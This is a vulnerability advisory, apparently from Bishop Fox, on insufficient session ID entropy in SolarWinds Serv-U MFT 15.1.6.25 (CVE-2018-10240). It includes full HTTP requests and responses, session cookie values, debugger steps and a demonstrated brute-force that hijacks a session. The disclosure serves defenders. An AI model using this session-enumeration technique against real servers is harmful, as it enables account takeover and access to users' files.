SolarWinds Serv-U Managed File Transfer – Insufficient Session ID Entropy

Gauge showing high severity reading

Share

Reported Date

January 8, 2018

Vendor

SolarWinds

Version Affected

Serv-U 15.1.6.25

Summary

SolarWinds Serv-U MFT 15.1.6.25 assigns authenticated users a low-entropy session token that can be included in requests to the application as a URL parameter in lieu of a session cookie. This session token's value can be brute-forced by an attacker to obtain the corresponding session cookie and hijack the user's session.

Vendor Status

The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.

Exploit Availability

The Serv-U MFT server ordinarily assigns a 128-byte session cookie upon successful authentication, as shown below:

HTTP/1.0 200 OK

Server: Serv-U/15.1.6.25

…omitted for brevity…

Expires: -1

Set-Cookie: Session=_a646c7843ff734bfe747b0f9fce48116eec2be94d2bd34ed3328f7407975db6d073c2af07fbdb2fb01a5249957bf694678e0a545c79bfe43aab27d87d554d1664bd4f6c1c198eb950754581406246bf8; path=/; secure; httponly;

Set-Cookie: CsrfToken=071F261B8B8FD63193FC4C13831BC4CE; path=/; secure; httponly;

Set-Cookie: SULang=en,US

X-Content-Length: 682

After a user successfully logs in, the application loads ListDir.htm, which displays the user's home directory. The JavaScript in this page contains Serv-U application URLs that include a Session, as shown below:

https://127.0.0.1/Web Client/ListDir.htm

diaPreview){if(bSearchList)sMediaPath="/?Command=PlayList&ListFile=ListMedia.m3u&Audio=1&Session=100603911"+SyncRequestParameter();else sMediaPath="/?Command=List&Dir="+sPlayListDir+"&ListFile=ListMedia.m3u&Audio=1&Session=100603911"+SyncRequestParameter();}else sMediaPath='/?Command=Download&File='+sEncodedFilePath+'&Media=1&Session=100603911';

This session value is an integer, and is accepted in lieu of a session cookie by the Serv-U application, as shown below:

Request:

POST /?Command=NOOP&Sync=1514386171311&Session=100603911 HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Length: 0

Origin: https://127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://127.0.0.1/Web%20Client/ListDir.htm

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Response:

HTTP/1.0 200 OK

Server: Serv-U/15.1.6.25

…omitted for brevity…

Expires: -1

Set-Cookie: Session=_a646c7843ff734bfe747b0f9fce48116eec2be94d2bd34ed3328f7407975db6d073c2af07fbdb2fb01a5249957bf694678e0a545c79bfe43aab27d87d554d1664bd4f6c1c198eb950754581406246bf8; path=/; secure; httponly;

Set-Cookie: CsrfToken=071F261B8B8FD63193FC4C13831BC4CE; path=/; secure; httponly;

Set-Cookie: SULang=en

X-Content-Length: 232
<?xml version="1.0" encoding="UTF-8" ?>
<response>
<result>0</result>
<ResultText>Operation was successful.</ResultText>
<SpaceAvailable>%AVAILABLE_BYTES%</SpaceAvailable>
<DirectorySize>%DIRECTORY_SIZE%</DirectorySize>
</response>

The research team entered this cookie into a request to a local installation of Serv-U running in a debugger. This was performed to discover the correlating shortened integer form of the session value:

POST /?Command=NOOP&Sync=1514386171311 HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Length: 0

Origin: https://127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Cookie: Session=_8c70aa7215c1067ff1e006e9589d21125bddafbf4dca93ae54741a9dd2d2e4089e9886970fcc4c32ba9101840ca367a96010fb7315c7baa87846f4704338e700f43d86f109822c2a0754581406246bf8

Referer: https://127.0.0.1/Web%20Client/ListDir.htm

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Using the 32-bit version of Serv-U in Windbg, the team set a breakpoint for the instruction at 1011ABFA, which correlated to the end of the deobfuscation function used to convert the 128-byte hexadecimal session value into the corresponding integer value. The address of the resulting integer session ID was stored in eax, and its contents are as follows:

049ff1d4 31 00 30 00 30 00 37 00 30 00 31 00 35 00 30 00 36 00  1.0.0.7.0.1.5.0.6.

This value, disclosed to an unauthenticated user, provided an index from which an attacker might begin incrementing or decrementing vales to discover a valid session ID.

To demonstrate how this vulnerability could be exploited, the research team created a new user session by logging into the application once again, and then used the value obtained in Figure 7 as a starting point for guessing the newly authenticated user's session ID. This session ID was discovered after incrementing the index value 4,780 times:

BishopFox-Advisory-SolarWindsEnumeration1

Successful brute-forcing of Serv-U MFT session ID

The server's response to this successful request included the below corresponding cookie value:

HTTP/1.0 200 OK

Server: Serv-U/15.1.6.25

Date: Wed, 27 Dec 2017 15:51:09 GMT

Accept-Encoding: deflate

Expires: -1

Set-Cookie: Session=_8c70aa7215c1067ff1e006e9589d2112119dd00b4027ebf831cb84a87b330de84eb32f9fa08005cefd34e3a95a48ad97cb9b7ed667e43057cd93997f173c42d78f5c30dd378a14690754581406246bf8; path=/; secure; httponly;

Researcher

Baker Hamilton, MD, MMSc of Bishop Fox

For Reference

CVE-2018-10240

National Vulnerability Database Write-Up

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Default fox headshot blue

About the author, Baker Hamilton

Contractor

Baker Hamilton, MD, MMSc (OSCE, OSCP) is a Bishop Fox alumnus who focused on application penetration testing, internal and external network penetration testing, source code review, and red teaming.

More by Baker

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.